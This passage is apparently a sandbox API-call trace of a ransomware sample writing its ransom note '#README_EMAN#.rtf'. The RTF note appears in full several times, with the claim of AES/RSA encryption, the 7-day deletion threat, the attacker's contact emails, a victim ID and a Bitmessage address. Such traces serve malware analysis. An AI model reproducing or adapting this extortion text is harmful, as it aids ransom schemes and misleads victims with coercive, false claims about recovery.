\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¡ñ¶zÎj¬¸úo²BR|\x9a\x9a^é°\x8fI\x8f(\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0300.132] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.135] CloseHandle (hObject=0x2d4) returned 1 [0300.135] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ug-arab\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ug-arab\\#readme_eman#.rtf")) returned 0xffffffff [0300.135] GetLastError () returned 0x2 [0300.135] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ug-arab\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ug-arab\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 